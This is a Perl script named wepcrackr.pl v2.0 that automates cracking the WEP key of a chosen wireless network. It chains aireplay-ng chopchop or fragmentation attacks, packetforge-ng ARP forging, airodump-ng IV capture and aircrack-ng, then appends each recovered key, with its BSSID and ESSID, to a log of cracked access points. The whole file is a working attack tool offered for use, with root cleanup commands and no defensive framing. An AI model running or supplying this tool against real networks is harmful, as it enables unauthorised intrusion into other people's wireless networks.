#!usr/bin/perl
#2.0 changes: addded file checking, recursivity, logfile of cracked AP's
$recursive = 0; # <-- 0 = off, 1 = on (keep trying if no key found)
sub banner {
print<<EOF;
________ ______ __
| | | |.-----.-----.| |.----.---.-.----.| |--.----.
| | | || -__| _ || ---|| _| _ | __|| <| _|
|________||_____| __||______||__| |___._|____||__|__|__|
v2.0 |__| By Ross Markham
EOF
}
if (@ARGV < 6)
{
system("clear");
&banner;
print<<EOF;
Usage (as root):
perl wepcrackr.pl <BSSID> <channel> <ESSID> <mac> <card> <4/5>
(4 = chopchop attack, 5 = fragmentation attack)
EOF
exit;
}
sub clean {
system("sudo rm -rf arp-request");
system("sudo rm -rf capture*.*");
system("sudo rm -rf replay_*.*");
system("sudo rm -rf cracked_wep.txt");
system("sudo rm -rf wpa_supplicant.conf");
}
sub stop {
print "[+] Cleaning up... again \n";
&clean;
if($recursive == 0){print "[+] Recursivity disabled in source (line 3) \n";}
print "[-] Cracking WEP failed \n";
if($recursive == 1){exec("sudo perl wepcrackr.pl $bssid $channel $essid $mac $interface $attack $attempt");}
exit;
}
$bssid = $ARGV[0]; #tryed using "shift @_" (outside sub routine) and "@argv", but didn't work, cheers clone4 anyway :D
$channel = $ARGV[1];
$essid = $ARGV[2];
$mac = $ARGV[3];
$interface = $ARGV[4];
$attack = $ARGV[5];
$attempt = $ARGV[6];
system("clear");
&banner;
if($attempt > 0){
print "[+] Attempt no. $attempt \n";
$attempt = $attempt + 1;
}
if(!$attempt){$attempt = 2;}
print "[+] Cleaning before cracking \n";
&clean;
open (config, ">wpa_supplicant.conf");
print config "network={\n";
print config " ssid=\"$essid\"\n";
print config " key_mgmt=NONE\n";
print config " bssid=$bssid\n";
print config " wep_key0=\"fakekey\"\n";
print config "}\n";
close (config);
if (!defined($pid = fork())) {
print "resources not avilable.\n";
} elsif ($pid == 0) {
use Cwd qw(realpath);
my $fullpath = substr(realpath($0), 0, -12);
exec("xterm -e sudo wpa_supplicant -c".$fullpath."wpa_supplicant.conf -Dwext -i$interface");
} else {
print "[+] Associating with $essid \n";
sleep 2;
if ($attack == 4){ print "[+] Performing chopchop attack \n"; }
if ($attack == 5){ print "[+] Performing fragmentation attack \n"; }
if ($attack != (4||5)){
print "[-] Only attack types 4 & 5 supported \n";
kill 15, $pid;
&stop;
}
system("xterm -e sudo aireplay-ng -$attack -F -h $mac -a $bssid mon0");
if (!glob<replay_*.xor>){
print "[-] Replay_*.xor couldn't be found!\n";
kill 15, $pid;
&stop;
}
print "[+] ";
system("sudo packetforge-ng -0 -h $mac -a $bssid -k 255.255.255.255 -l 255.255.255.255 -y replay_*.xor -w arp-request mon0");
if (!defined($airodumpid = fork())) {
die "cannot fork: $!";
} elsif ($airodumpid == 0) {
print "[+] Capturing IV's \n";
exec("xterm -e sudo airodump-ng -c $channel --bssid $bssid -w capture mon0");
} else {
if (!defined($aireplayid = fork())) {
die "cannot fork: $!";
} elsif ($aireplayid == 0) {
print "[+] Sending ARP requests \n";
exec("xterm -e sudo aireplay-ng -2 -F -r arp-request mon0");
}else{
print "[+] Cracking IV's \n";
$filehasdata = 0;
while ($filehasdata == 0){
if ( (-s "capture-01.cap") && (-e "capture-01.txt") ){ $filehasdata = 1; }
}
system("sudo aircrack-ng -q -b $bssid capture*.cap > cracked_wep.txt");
print "[+] Killing threads \n";
kill 15, $aireplayid;
kill 15, $airodumpid;
kill 15, $pid;
}
}
}
open(KEY, "cracked_wep.txt");
while (<KEY>){
my($line) = $_;
chomp($line);
$line =~ tr/[a-z]/[A-Z]/;
if($line =~ m/KEY FOUND/){
$line = substr($line, 11);
$wep_key = $line;
}
}
close(KEY);
print "[+] Cleaning up... again \n";
&clean;
if($wep_key){
open(SAVEDKEYS, ">>wireless_cracked.txt");
print SAVEDKEYS "BSSID: $bssid \n";
print SAVEDKEYS "ESSID: $essid \n";
print SAVEDKEYS "channel: $channel \n";
print SAVEDKEYS "key: $wep_key \n\n";
close (SAVEDKEYS);
}
if($wep_key){
print "[!] Wep key: $wep_key \n";
}else{
if($recursive == 0){print "[+] Recursivity disabled in source (line 3) \n";}
print "[-] Cracking WEP failed \n";
if($recursive == 1){exec("sudo perl wepcrackr.pl $bssid $channel $essid $mac $interface $attack $attempt");}
}